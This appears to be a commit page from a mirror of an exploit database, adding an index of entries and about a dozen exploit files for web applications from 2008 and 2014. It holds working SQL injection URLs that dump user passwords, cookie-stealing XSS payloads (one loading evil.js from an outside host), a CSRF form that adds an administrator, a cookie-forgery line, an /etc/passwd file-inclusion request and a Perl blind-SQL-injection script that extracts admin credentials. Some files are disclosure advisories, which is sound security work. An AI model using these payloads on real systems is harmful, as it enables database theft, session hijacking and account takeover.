bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 02_22_2014

Browse source
This commit is contained in:
Offensive Security 2014-02-22 04:27:45 +00:00
parent 024408074b
commit 555ad2fb36
23 changed files with 1015 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
files.csv
View file

@ -28576,3 +28576,25 @@ id,file,description,date,author,platform,type,port
31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0
31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 'AccesCodeStart.asp' Cross-Site Scripting Vulnerability",2008-05-13,"Brad Antoniewicz",asp,webapps,0
31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal 'linking.page.php' SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0
31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit",2014-02-20,"Julien Ahrens",windows,remote,0
31790,platforms/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps,0
31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 ""CATV5_Backbone_Bus"" - Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555
31792,platforms/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,php,webapps,80
31793,platforms/php/webapps/31793.txt,"Horde Turba 3.1.7 Multiple Cross-Site Scripting Vulnerabilities",2008-05-14,"Ivan Javier Sanchez",php,webapps,0
31794,platforms/php/webapps/31794.txt,"PicsEngine 1.0 'index.php' Cross Site Scripting Vulnerability",2008-05-14,ZoRLu,php,webapps,0
31795,platforms/php/webapps/31795.txt,"Links Pile 'link.php' SQL Injection Vulnerability",2008-08-14,HaCkeR_EgY,php,webapps,0
31796,platforms/php/webapps/31796.txt,"Internet Photoshow 'login_admin' Parameter Unauthorized Access Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0
31797,platforms/asp/webapps/31797.txt,"Philboard 0.5 W1L3D4_foruma_yeni_konu_ac.asp forumid Parameter SQL Injection",2008-05-14,U238,asp,webapps,0
31798,platforms/php/webapps/31798.txt,"Philboard 0.5 W1L3D4_konuoku.asp id Parameter SQL Injection",2008-05-14,U238,php,webapps,0
31799,platforms/php/webapps/31799.txt,"Philboard 0.5 W1L3D4_konuya_mesaj_yaz.asp Multiple Parameter SQL Injection",2008-05-14,U238,php,webapps,0
31800,platforms/php/webapps/31800.pl,"SunShop Shopping Cart <= 3.5.1 'index.php' SQL Injection Vulnerability",2008-05-15,irvian,php,webapps,0
31801,platforms/php/webapps/31801.txt,"ACGV News 0.9.1 glossaire.php id Parameter SQL Injection",2008-05-16,ZoRLu,php,webapps,0
31802,platforms/php/webapps/31802.txt,"ACGV News 0.9.1 glossaire.php id Parameter XSS",2008-05-16,ZoRLu,php,webapps,0
31803,platforms/php/webapps/31803.txt,"AN Guestbook 0.4 'send_email.php' Cross Site Scripting Vulnerability",2008-05-16,ZoRLu,php,webapps,0
31804,platforms/php/webapps/31804.txt,"Digital Hive 2.0 'base_include.php' Local File Include Vulnerability",2008-05-16,ZoRLu,php,webapps,0
31805,platforms/php/webapps/31805.txt,"PHP-Nuke 'KuiraniKerim' Module 'sid' Parameter SQL Injection Vulnerability",2008-05-17,Lovebug,php,webapps,0
31806,platforms/php/webapps/31806.txt,"bcoos 1.0.13 'file' Parameter Local File Include Vulnerability",2008-05-19,Lostmon,php,webapps,0
31807,platforms/php/webapps/31807.txt,"cPanel <= 11.21 'wwwact' Remote Privilege Escalation Vulnerability",2008-05-19,"Ali Jasbi",php,webapps,0
31808,platforms/php/webapps/31808.txt,"AppServ Open Project <= 2.5.10 'appservlang' Parameter Cross Site Scripting Vulnerability",2008-05-20,"CWH Underground",php,webapps,0
31809,platforms/php/webapps/31809.txt,"Starsgames Control Panel 4.6.2 'index.php' Cross Site Scripting Vulnerability",2008-05-20,"CWH Underground",php,webapps,0
31810,platforms/php/webapps/31810.txt,"Web Slider 0.6 'slide' Parameter SQL Injection Vulnerability",2008-05-20,"fahn zichler",php,webapps,0

Can't render this file because it is too large.

9
platforms/asp/webapps/31797.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_foruma_yeni_konu_ac.asp?forumid=1+union+select+0,1,(username),(password),1,1+from+users

319
platforms/hardware/webapps/31790.txt Executable file
View file

@ -0,0 +1,319 @@
Document Title:
===============
Barracuda Bug Bounty #30 Firewall - Multiple Persistent Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1065
Barracuda Networks Security ID (BNSEC): BNSEC-2067
Video: http://www.vulnerability-lab.com/get_content.php?id=1208
View Video: http://www.youtube.com/watch?v=-yQVyik3Ggo
Release Date:
=============
2014-02-19
Vulnerability Laboratory ID (VL-ID):
====================================
1065
Common Vulnerability Scoring System:
====================================
3.9
Product & Service Introduction:
===============================
The Barracuda Firewall goes beyond traditional network firewalls and UTMs by providing powerful network security, granular layer 7
application controls, user awareness and secure VPN connectivity combined with cloud-based malware protection, content filtering
and reporting. It alleviates the performance bottlenecks in Unified Threat Management (UTM) appliances through intelligent integration
of on-premise and cloud-based technologies. While the powerful on-premises appliance is optimized for tasks like packet forwarding and
routing, Intrusion Prevention (IPS), DNS/DHCP services and site-to-site connectivity; CPU intensive tasks like virus scanning, content
filtering and usage reporting benefit from the scalable performance and elasticity of the cloud.
(Copy of the Vendor Homepage: https://www.barracuda.com/products/firewall )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities in the Barracuda Web Firewall appliance web-application.
Vulnerability Disclosure Timeline:
==================================
2013-09-04: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-09-05: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2013-09-26: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2014-02-17: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordinated Disclosure]
2014-02-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Web Firewall 6.1.0.016 - Models: X100; X200; X300; X400 & X600
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities are detected in the Barracuda Networks Web Firewall X300 (v6.1.0.016) Appliance Web Application.
The validation web vulnerability allows remote attackers or local low privileged application user accounts to inject (persistent) own malicious script
codes on application-side of the vulnerable module.
The vulnerability is located in the firewall menu when processing to create a custom user object with manipulated create user expresson
group credentials. Remote attackers can inject script codes to the `Login Name` & `Group Match pattern text` input fields. After the inject
the attacker can save the input via add (POST Method) to execute the persistent code in the edit listing. After the first add (inject) in the
edit formular the remote attacker is also able to add the input via `add to the second selection` listing to execute the persistent code in
both listing values of the bottom page. Remote attackers are able to add the persistent injected context to the main custom user objects
module in the predefined user objects listing. The attack vector is persistent and the request method is POST. The security risk of the
persistent input validation web vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.8(+)|(-)3.9.
Exploitation of the vulnerability requires a low privileged application user account and low user interaction. Successful exploitation results
in session hijacking, persistent phishing, persistent external redirects & persistent manipulation of affected or connected web module context.
Vulnerable Application(s):
[+] Firewall (WAF) Appliance Application (X300Vx v6.1.0.016)
Vulnerable Module(s):
[+] Firewall > User Objects > Custom User Objects > Create User Object > Create User Expression
Vulnerable Parameter(s):
[+] login name
[+] pattern - Group Match
Affected Module(s):
[+] Firewall > User Objects > Custom User Objects > Predefined User Objects Listing
[+] Firewall > User Objects > Custom User Objects > Create User Object > Create User Expression (Group)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
Manual steps to reproduce the vulnerability:
1. Login with the user account to the barracuda networks web firewall appliance application
2. After the login open the firewall and switch to the User Objects > Custom User Objects > Create User Object module
3. Start creating via user expression a group
4. Include a random name for the main mask, and add your script code as payload to the login name and pattern (group match) input fields
5. Click the checkbox for the group match and click the add button to save the input
6. The code executes in the add box context itself and the group match or pattern values listing (bottom) [3 times]
7. Now, the attacker is also able to add the already injected persistent context to the main menu listing by a click of the add button to save at the bottom
8. The script code execution occurs when processing to watch the firewall_user_objects module index item listing
Note: The vulnerable values are login name (name) and pattner
9. Successful reproduce of the persistent web vulnerabilities!
PoC: firewall_user_objects - index listing
<tr style="" class="config_module_tr display oddRow" id="config_module_rowfw_predefined_user_objects_1_1"
onmouseout="if (!this.isSelected) {this.style.background=this.prevBackground;}"
onmouseover="if (!this.isSelected) {this.prevBackground=this.style.background;this.style.background='#a1a1a1';}">
<td style="width: 150px;"> </td>
<td style="width: 200px;"> </td>
<td style="width:150px"><[PERSISTENT INJECTED SCRIPT CODE!]></td>
<td style="width:250px"><[PERSISTENT INJECTED SCRIPT CODE!]></td>
<td style="width: 116px;"> </td>
</tr>
Reference(s):
https://firewall.ptest.localhost:6299/cgi-mod/index.cgi
?auth_type=Local&et=1378340277&locale=en_US&password=b9bc2762a9868729613918058ac1fb56&user=guest&primary_tab=FIREWALL&secondary_tab=firewall_user_objects
PoC: Create User Object > Create User Expression - Listing
<tr class="config_module_tr" id="config_module_row_4">
<td valign="top" width="15"> </td>
<td valign="top" width="100">Group Match</td>?????
<td valign="top" width="400"><table class="config_module IT" frame="box" id="group_match_table" rules="none" summary="Box"
cellpadding="0" cellspacing="0"><tbody><tr bgcolor="#cccccc"><td style="text-align:center;"><b>Pattern</b></td>
<td style="text-align:center;" width="20"><b></b></td></tr><tr><td><input class="" autocomplete="off"
id="group_match_pattern" name="group_match_pattern" size="30" type="text"></td><td width="20"><input class="new_button"
id="+" name="+" onclick="add_group_match_pattern()" value="+" type="button"></td></tr>
<tr class="pattern"><td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]"></iframe></td><td><input class="new_button" value="-"
name="0" type="button"></td>?????</tr></tbody></table><input id="pattern_group_match:yes" name="pattern_group_match" value="yes" type="checkbox">
<label for="pattern_group_match:yes" style="display:inline">All Group Patterns must match</label></td>
<td valign="top" width="120"><div id="helpbox"><b class="outlinetop">
<b class="outline1"></b>
<b class="outline2"></b>
<b class="outline3"></b>
<b class="outline4"></b></b>
<div id="contents"><div>List of user group patterns according to efficient authentication method.<br>
If the check box is cleared, only one list item may match. <b>Default</b>: Off</div></div>
<b class="outlinebottom"><b class="outline4"></b><b class="outline3"></b><b class="outline2"></b><b class="outline1"></b></b>
</div></td></tr>
... && Add
<tbody><tr bgcolor="#cccccc"><td style="text-align:center;" width="100">?????<b>Name</b></td><td style="text-align:center;"
width="100"><b>Group Match</b></td><td style="text-align:center;" width="50"><b></b></td></tr>
<tr class="pattern">
<td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]"></iframe></td><td>a%20>"?????<[PERSISTENT INJECTED SCRIPT CODE!]">
</iframe></td><td><img style="cursor:pointer;" name="0" src="/images/edit.png"><input name="0" src="/images/del.png" type="image"></td></tr></tbody>
--- Request Session Logs ---
Status: 200[OK]
POST https://firewall.ptest.localhost:6299/cgi-mod/index.cgi
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ]
Content Size[-1] Mime Type[text/plain]
Request Headers:
Host[firewall.ptest.localhost:6299]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/javascript, text/html, application/xml, text/xml, */*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With[XMLHttpRequest]
X-Prototype-Version[1.7]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
Referer[https://firewall.ptest.localhost:6299/cgi-mod/index.cgi?
password=4b3c71efe69b776c7af9c2a0e44d8da6&et=1378331067&content_only=1&primary_tab=FIREWALL&new_secondary_tab=
firewall_user_objects&auth_type=Local&user=guest&locale=en_US&secondary_tab=add_firewall_user_object&ispopup=1&
parent_name=add_firewall_user_object&popup_width=530&popup_height=500]
Content-Length[237]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
ajax_action[check_param_ajax_single]
name[group_match_pattern]
value[(PERSISTENT INJECTED SCRIPT CODE!)<]
user[guest]
password[2f156d447f2d3972ab50762e5b0f581d]
et[1378331075]
locale[en_US]
auth_type[Local]
realm[]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Date[Wed, 04 Sep 2013 21:26:16 GMT]
Content-Type[text/plain; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
GET https://firewall.ptest.localhost:6299/cgi-mod/[PERSISTENT INJECTED SCRIPT CODE!]<
Load Flags[LOAD_DOCUMENT_URI ]
Content Size[1789] Mime Type[text/html]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.localhost:6299/cgi-mod/index.cgipassword=4b3c71efe69b776c7af9c2a0e44d8da6&et=1378331067&content_only=
1&primary_tab=FIREWALL&new_secondary_tab=firewall_user_objects&auth_type=Local&user=guest&locale=en_US&secondary_tab=
add_firewall_user_object&ispopup=1&parent_name=add_firewall_user_object&popup_width=530&popup_height=500]
Connection[keep-alive]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Date[Wed, 04 Sep 2013 21:26:16 GMT]
Content-Type[text/html]
Content-Length[1789]
Connection[keep-alive]
Reference(s):
https://firewall.ptest.localhost:6299/cgi-mod/index.cgi?
password=a1524626db9371fd7c3db09cc21836aa&et=1378331929&content_only=1&primary_tab=FIREWALL&new_secondary_tab=firewall_user_objects
&auth_type=Local&user=guest&locale=en_US&secondary_tab=add_firewall_user_object&ispopup=1&parent_name=add_firewall_user_object&
popup_width=530&popup_height=500
https://firewall.ptest.localhost:6299/cgi-mod/index.cgi?
auth_type=Local&et=1378340277&locale=en_US&password=b9bc2762a9868729613918058ac1fb56&user=guest&primary_tab=FIREWALL&
secondary_tab=firewall_user_objects
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the match group pattern and login name input fields in the firewall_user_objects module.
Encode also the vulnerable output item listing of the pattern text and login name in the main- and edit firewall_user_objects listing to prevent
further persistent script code injection attacks via POST method request. Implement the regular alos the regular formular validation of barracuda
the the item list module.
2014-02-17: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordinated Disclosure]
Barracuda Networks: Appliances > Advanced > Firmware Updates (automatic) page or use the regular customer panel (https://login.barracudanetworks.com/auth/login/) to update manually.
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities are estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

170
platforms/php/webapps/31792.txt Executable file
View file

@ -0,0 +1,170 @@
?
Stark CRM v1.0 Multiple Script Injection And Session Riding Vulnerabilities
Vendor: IWCn Systems Inc.
Product web page: http://www.iwcn.ws
Affected version: 1.0
Summary: This is a light weight CRM which simplifies process
of managing staff, client and projects.
Desc: Multiple stored XSS and CSRF vulnerabilities exist when
parsing user input to several POST parameters. The application
allows users to perform certain actions via HTTP requests without
performing any validity checks to verify the requests. This
can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site and/or
execute arbitrary HTML and script code in a user's browser session.
Tested on: Nginx, PHP, MySQL
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5169
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5169.php
03.02.2014
--
CSRF (Add Admin):
################
<html>
<!--
http://lab17.zeroscience.mk/testing/index.php?page=admin - Add Admin
http://lab17.zeroscience.mk/testing/index.php?page=agent - Add Agent
http://lab17.zeroscience.mk/testing/index.php?page=sub_agent - Add Sub-Agent
http://lab17.zeroscience.mk/testing/index.php?page=partner - Add Partner
http://lab17.zeroscience.mk/testing/index.php?page=client - Add Client
-->
<body>
<form action="http://lab17.zeroscience.mk/testing/index.php?page=admin" method="POST">
<input type="hidden" name="first_name" value="Admin101" />
<input type="hidden" name="last_name" value="Admin202" />
<input type="hidden" name="comp_name" value="Zero Science Lab" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="pwd" value="123456" />
<input type="hidden" name="phonep" value="(111) 111-1111" />
<input type="hidden" name="phoneg" value="(111) 111-1111" />
<input type="hidden" name="notes" value="Testing2 Address 101" />
<input type="hidden" name="zip" value="11111" />
<input type="hidden" name="ahv" value="11111" />
<input type="hidden" name="date" value="03.02.2014" />
<input type="hidden" name="gender" value="female" />
<input type="hidden" name="f_status" value="Married" />
<input type="hidden" name="detail" value="Testing3 personal detailz" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Stored XSS (parameter: name):
############################
POST /testing/index.php?page=add_ticket HTTP/1.1
Host: lab17.zeroscience.mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://lab17.zeroscience.mk/testing/index.php?page=add_ticket
Cookie: PHPSESSID=51422dfc2ef2d3569e778d06d20c7a25
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------94321629522129
Content-Length: 592
-----------------------------94321629522129
Content-Disposition: form-data; name="name"
"><script>alert(1);</script>
-----------------------------94321629522129
Content-Disposition: form-data; name="project"
1
-----------------------------94321629522129
Content-Disposition: form-data; name="description"
ZSL
-----------------------------94321629522129
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
-----------------------------94321629522129
Content-Disposition: form-data; name="submit"
-----------------------------94321629522129--
Stored XSS (parameters: first_name, last_name, notes):
#####################################################
<html>
<body>
<form action="http://lab17.zeroscience.mk/testing/index.php?page=client" method="POST">
<input type="hidden" name="first_name" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="last_name" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="comp_name" value="Zero Science Lab" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="pwd" value="test" />
<input type="hidden" name="phonep" value="(111) 111-1111" />
<input type="hidden" name="phoneg" value="(111) 111-1111" />
<input type="hidden" name="notes" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="zip" value="00000" />
<input type="hidden" name="ahv" value="test2" />
<input type="hidden" name="date" value="03.02.2014" />
<input type="hidden" name="gender" value="male" />
<input type="hidden" name="f_status" value="Single" />
<input type="hidden" name="detail" value="test" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Stored XSS (parameters: insu_name, price):
#########################################
<html>
<body>
<form action="http://lab17.zeroscience.mk/testing/index.php?page=add_insurance_cat" method="POST">
<input type="hidden" name="insu_name" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="price" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Stored XSS (parameter: status[]):
################################
<html>
<body>
<form action="http://lab17.zeroscience.mk/testing/index.php?page=add_status" method="POST">
<input type="hidden" name="status[]" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

12
platforms/php/webapps/31793.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29213/info
Horde Turba is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Turba Content Manger 2.1.7 is vulnerable; other versions may also be affected.
1-object%5Bemail5D= "><script
src=http://www.example.com/scripts/evil.js></script>
2-object%5Btitle5D= "><script
src=http://www.example.com/scripts/evil.js></script>

10
platforms/php/webapps/31794.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29214/info
PicsEngine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
PicsEngine 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/1_0/admin/index.php?l=[XSS]

7
platforms/php/webapps/31795.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/29223/info
Links Pile is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*

12
platforms/php/webapps/31796.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29227/info
Internet Photoshow is prone to a vulnerability that can result in unauthorized database access.
Attackers can exploit this issue to gain administrative access to the application.
Internet Photoshow Special Edition is vulnerable; other editions may also be affected.
The following example code is available:
javascript:document.cookie = "login_admin=true; path=/";

9
platforms/php/webapps/31798.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuoku.asp?id=1+union+select+0,1,2,3,4,5,6,1,1,1,1,1,1,1,7,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,8,9,1,1,1,1,1,1,1,1,1,1+from+users

9
platforms/php/webapps/31799.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuya_mesaj_yaz.asp?id=1+union+select+(password),username,password,password,4,1,1,1,null,1,password,password,password,password,password+from+users

101
platforms/php/webapps/31800.pl Executable file
View file

@ -0,0 +1,101 @@
source: http://www.securityfocus.com/bid/29241/info
SunShop Shopping Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SunShop Shopping Cart 3.5.1 is vulnerable; other versions may also be affected.
#!/usr/bin/perl -w
use LWP::UserAgent;
# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection
# scripts site : http://www.turnkeywebtools.com/sunshop/
# Discovered
# By : irvian
# site : http://irvian.cn
# email : irvian.info@gmail.com
print "\r\n[+]-----------------------------------------[+]\r\n";
print "[+]Blind SQL injection [+]\r\n";
print "[+]SunShop Version 3.5.1 [+]\r\n";
print "[+]code by irvian [+]\r\n";
print "[+]special : ifx, arioo, jipank, bluespy [+]\r\n";
print "[+]-----------------------------------------[+]\n\r";
if (@ARGV < 5){
die "
Cara Mengunakan : perl $0 host option id tabel itemid
Keterangan
host : http://victim.com
Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari password
id : Isi Angka Kolom id biasanya 1, 2 ,3 dst
tabel : Isi Kolom tabel biasanya admin atau ss_admin
itemid : Isi Angka valid (ada productnya) di belakang index.php?action=item&id=
Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10
\n";}
$url = $ARGV[0];
$option = $ARGV[1];
$id = $ARGV[2];
$tabel = $ARGV[3];
$itemid = $ARGV[4];
if ($option eq 1){
syswrite(STDOUT, "username: ", 10);}
elsif ($option eq 2){
syswrite(STDOUT, "password: ", 10);}
for($i = 1; $i <= 32; $i++){
$f = 0;
$n = 32;
while(!$f && $n <= 57)
{
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
if ($f==0){
$n = 97;
while(!$f && $n <= 122)
{
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
}
}
print "\n[+]finish Execution Exploit\n";
sub blind {
my $site = $_[0];
my $op = $_[1];
my $id = $_[2];
my $tbl = $_[3];
my $i = $_[4];
my $n = $_[5];
my $item = $_[6];
if ($op eq 1){
$klm = "username";
}
elsif ($op eq 2){
$klm = "password";
}
my $ua = LWP::UserAgent->new;
my $url = "$site"."/index.php?action=item&id="."$item"."'%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."$tbl"."%20WHERE%20id="."$id"."),"."$i".",1)=CHAR("."$n".")/*";
my $res = $ua->get($url);
my $browser = $res->content;
if ($browser !~ /This product is currently not viewable/i){
return 1;
}
else {
return 0;
}
}

9
platforms/php/webapps/31801.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29253/info
ACGV News is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ACGV News 0.9.1 is vulnerable; other versions may also be affected.
http://www.example.com/ACGVnews/glossaire.php?id=[SQL]

9
platforms/php/webapps/31802.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29253/info
ACGV News is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ACGV News 0.9.1 is vulnerable; other versions may also be affected.
http://www.example.com/ACGVnews/glossaire.php?id="><script>alert(document.cookie)</script>

10
platforms/php/webapps/31803.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29254/info
AN Guestbook (ANG) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
ANG 0.4 is vulnerable; other versions may also be affected.
http://www.example.com/ang/send_email.php?postid=[XSS]

9
platforms/php/webapps/31804.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29255/info
Digital Hive is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Digital Hive 2.0 RC2 is vulnerable; other versions may also be affected.
http://www.example.com/hive_v2.0_RC2/template/purpletech/base_include.php?page=../../etc/passwd

7
